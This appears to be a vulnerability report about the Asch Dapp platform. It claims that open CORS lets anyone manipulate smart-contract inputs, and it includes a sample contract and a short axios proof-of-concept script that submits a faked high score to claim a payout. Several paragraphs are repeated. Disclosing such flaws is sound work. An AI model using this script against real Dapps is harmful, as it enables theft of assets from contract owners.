Asch is an efficient, flexible, safe and decentralized application platform, which was initially designed to lower the barrier to entry for developers.The services provided by the Asch platform include a public chain and a set of application SDKs.
The above means that input values for the (smart) contract of a Dapp can be manipulated.
For instance my contract winner.js may look like:
module.exports = {
winner: async function(score) {
if (score > 100) {
//pay the user some assests because his score is higher then 100
}
}
}
Now everyone can run the following script to get some assest and be an winner:
const axios = require('axios');
var fee = '10000000'
var data = {
secret: "acquire paper fun spice celery design able shrimp lunch angry alter gather",
fee: fee,
type: 1001, //the number for winner.winner
args: 1000 // a very high score
}
axios.put('http://localhost:4096/api/dapps/ee0c22de321610bbc5698243d66f5122a20d2b1b1d534ee4f636165e1b6cd6f6/transactions/unsigned',data)
.then(function (response) {
console.log(response);
})
.catch(function (error) {
console.log(error);
})
.then(function () {
// always executed
});
I believe that CORS can be useful for testing purposes, but it should be disabled for production (mainnet) at least.
As far as i do understand Dapp run on a express server, with the cors middleware enabled, see also https://github.com/AschPlatform/asch/blob/master/src/init.js#L166.
As already described at https://github.com/bassjobsen/howto-asch-docs/blob/master/use-assets.md, and asked at https://stackoverflow.com/questions/51603087/how-to-guarantee-that-the-input-of-the-smart-contract-is-not-manipulated, PUT (same for POST, GET etc too) requests to the Dapp from anywhere are allowed.
The above means that input values for the (smart) contract of a Dapp can be manipulated.
For instance my contract
winner.js
may look like:Now everyone can run the following script to get some assest and be an winner:
I believe that CORS can be useful for testing purposes, but it should be disabled for production (mainnet) at least.